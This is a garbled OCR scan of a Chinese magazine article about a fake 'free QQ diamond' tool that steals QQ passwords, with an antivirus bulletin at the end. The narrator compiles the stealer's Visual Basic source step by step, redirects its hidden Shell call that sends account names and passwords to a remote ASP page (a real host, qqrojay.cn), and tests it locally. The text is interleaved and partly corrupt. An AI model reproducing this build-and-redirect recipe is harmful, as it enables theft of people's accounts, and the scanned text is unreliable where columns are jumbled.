免费刷钻--QQ盗号出新招

2024年4月4日发(作者：)

黑客战线　

－蜀国布衣　

Ｑ　Ｑ盗号出新招　

我们班有一个爱显摆的同学叫大　

大牛，谁知他居然说：“浓缩的好啊！精华啊！”　

打开它后，我无意间扫了一眼软件标题栏的信息，发现了“ＱＱ业务暴力　

获取器”几个字，非常眼熟。经过仔细的回忆，我想起在一个黑客论坛里看到　

过有人提供“ＱＱ业务暴力获取器”的源代码下载。不过，它可不是什么刷钻　

软件，而是一个彻头彻尾的ＱＱ盗号软件！如果大牛傻傻地在其窗口中登录　

ＱＱ并进行免费刷钻的操作，那么ＱＱ账号及密码很快就会失窃。　

牛，他成天痴迷于“点亮　ＱＱ上的那一　

长串服务图标。这天晚自习时，我发现　

他一个人躲在教室后排摆弄着笔记本　

电脑，还不时傻笑—下…”。这小子，　

难道在网上搭讪美女？我走过去一看，　

原来他在下载一款针对ＱＱ的刷钻软　

件，据说这款软件可以为用户免费开通　

各种收费的ＱＱ服务。　

注：本文仅是技术研究，文中相关　

软件有技术研究兴趣的读者可在网上搜　

索下载。　

架设网络空间　

我马上向大牛讲明这一情况，他被我的话震惊了。只见他问道：“兄弟，　

你说的是真的？给我好好讲讲吧！”我当然不好拒绝，便欣然答应：“好吧！　

我给你讲讲。ＱＱ盗号这个把戏，发送方式很重要，通常有两种，即电子邮箱　

发送和网页地址发送。‘ＱＱ业务暴力获取　

首先，我打开一个文本编辑器，保　

可疑的刷钻软件　

我们都知道，ＱＱ为用户提供了很多　

服务，但其中有一部分服务是需要花钱　

才能够享用的。难道天上真的掉馅饼，用　

这款刷钻软件就能骗过腾讯？于是，我　

带着怀疑，让大牛给我看看这款软件。　

我接过笔记本电脑一看，刚下载的　

这款软件非常小巧，就一个ＥＸＥ文件，　

容量只有２４ＫＢ。这么小的玩意儿可以　

持文本框为空，直接点击“文件”菜单　

中的“另存为”命令将其保存为ｑｑ．ａｓｐ脚　

本文件（如图２）。　

我告诉大牛：“接下来，我们要用ＦＴＰ软件把ｑｑ．ａｓｐ上传到网络空间里　

面。”谁知大牛有些委屈地说：“我哪有什么网络空间啊？从来没玩过这个，　

你有吗？　我安慰他道：“没有网络空间也行啊！我们完全可以在自己的系统　

里面架设一个空间。”说完，我下载了一款名为ＡＷＳ的网络软件，它是一个简　

单易用的小型ＡＳＰ调试程序。我先把ｑｑ．ａｓｐ文件复制到ＡＷＳ程序的文件夹　

中，然后运行文件夹中的ＡＷＳ．ＥＸＥ文件，就完成了本地网络空间的架设。而　

ｑｑ．ａｓｐ文件也获得了一个链接地址，￣ｈｔｔｐ：／／１２７．０．０．１／ｑｑ．ａｓｐ。　

干啥啊（如图１）？我把自己的想法告诉　

编译盗号软件　

我从网上下载了那个名为“ＱＱ业务暴力获取器”的源代码压缩包。解压　

后，发现它没有现成可用的程序文件，得动手编译—　

接着我就下载并安装了Ｖｉｓｕａｌ　Ｂａｓｉｃ　６．０的精简版。运行它后，在软件　

工具栏中点击“打开”按钮，导人“ＱＱ业务暴力获取器”的源代码文件。这时　

大牛疑惑地问：“这些源代码…一，怎么我一句都看不懂啊？”我告诉他说：　

“这里的代码你不必都看懂，只需要搞明白其中关键的一句就行了，ＯＰＳｈｅｌｌ　

”Ｃ：＼Ｐｒｏｇｒａｍ　Ｆｉｌｅｓ＼Ｉｎｔｅｒｎｅｔ　Ｅｘｐｌｏｒｅｒ＼ｉｅｘｐｌｏｒｅ．ｅｘｅ　ｈｔｔｐ：／／ｑｑｒｏｊａｙ．ｃｎ／ｑｑｍｍ．　

４８｛第２４期１２ｏ１０ＩＰｃＤ　

唑

Ｐｃｄ２∞

嘲ｙ园ｌ口ｍａ¨．

ＣＯｍ

　圆‘ｌ．＿　．１■【ｌ　

ａｓｐ？ｎａｍｅ＝”＋ａ＋”＆ｐａｓｓ＝”＋ｂ，ｖｂＨｉｄｅ（如　

图３）。它的意思是，将获得的账号吸密码信息，　

真相大白揭谜底　

运行ＱＱ．ｅｘｅ，也就是“ＱＱ业务　

发送到黑客指定的网页链接里面。”大牛听完　

我的话，若有所思地说：“我好像有点明白　暴力获取器”，其界面和大牛下载的　

那个一模一样。这时大牛好像还是　

不信这样简单的一个程序居然是盗　

号软件。于是我对他说：“不信就试　

试吧！你在它的‘ＱＱ账号’和‘ＱＱ　

下面我们是不是要ｍｑｑ．ａｓｐ文件的链接去替换　

源代码中黑客默认设置的链接？”我非常欣慰　

地回道：“真是孺子可教也！”　

密码’框中随意输入，但千万不要告　

诉我输入的内容……”不待我说完，　

大牛便开始了输入。接着他还问：　

…业务列表’下面的刷钻项目要不　

要勾选啊？”我告诉他这些项目都是　

骗人的，随便选吧（如图５）！设置完成后，点击“获取业务”按钮，大牛　

把源代码里面　

对我摆了一个ＯＫ的手势。　

我不慌不忙地运行ＩＥ浏览器，然后在地址栏中输￣．ｈｔｔｐ：／／１２７．０．０．１／　

ｑｑ．ａｓｐ。我的输入还没完成，ＩＥ浏览器就自动补完了的整个地址。这时　

的链接替换好后，　

点击“文件”菜单中　

的“生成ＱＱ．ｅｘｅ”　

命令，开始对源代　

码进行编译（如　

图４），最后得到　

ＱＱ．ｅｘｅ文件。　

大牛惊奇地看到地址栏中多出了一串信息，毋庸置疑ｎａｍｅ参数后面就　

是他刚才输入的ＱＱ号，而ｐａｓｓ参数后面当然就是ＱＱ密码了（如图６）。　

这样匪夷所思的结果让大牛目瞪口呆。他一边摇头一边感叹：“这些黑　

客太无耻了！像我这样的纯情少男他们都要骗……”而我则安慰他道：“不　

是黑客太无耻，是你太贪小便宜。记住，天上不会掉馅饼，呵呵Ｊ”皿匝亘回　

瑞星呈功能安茔软件　

据瑞星“云安全”系统统计，这段时间共截获３５万个挂马网址。近期，经典小游戏“植物大战僵尸　推出了新版本．网民下载热情　

高涨，许多不良下载网站便借机利用它来传播网游盗号木马，大家要小心提防。　

近期网站挂马　

“纵横财经社区”、“海青网”和“武汉市质量技术监督局”等网站的部分页面被黑客挂马。黑客利用微软ＩＥ最新漏洞和服务器的　

不安全设置入侵，用户访问这些页面后，可能会感染恶性后门病毒。　

近期病毒　

病毒防范方法　

１．使用Ｋ瑞星全功能安全软件２０１０）），可有效阻挡通过网页挂马方　

圈游木马病一　］　

ｐ：／／ｗｗｗ．ｒｉｓｉｎｇ．ＣＯｍ．ｏｎ／）。　

Ｔｒｏｊａｎ．ＰＳＷ．Ｗｉｎ３２．ＯｎｌｉｎｅＧａｍｅ．ａｕｔ　Ｉ　

式传播的病毒（下载地址：ｈｔｔ

２．安装《卡卡上网安全助手６．２》．可修复系统中的漏洞（下载地　

警惕程度★★★　ｌ　

址：ｈｔｔｐ：／／ｔｏｏ１．ｉｋａｋａ．ｃｏｍ／）。　

该病毒通过挂马网站传播。运行后，它会通过记Ｉ　

３．可拨打瑞星客服热线４００—６６０．８８６６咨询，也可　

录键盘．读取游戏窗口信息和内存信息等方式，盗取｝　

多款主流网络游戏的账号及密码。　

　ｈｔｔｐ：／／ｃｓｃ．ｒｉｓｉｎｇ．ｏｏｌｒ１．ｃｎ寻求帮　

ｆ　

访阉瑞星客户服务中一

助，使用在线专家门诊获得技术支持。　

ＰｃＤＩ２０１ｏ怫２４期ｌ岛国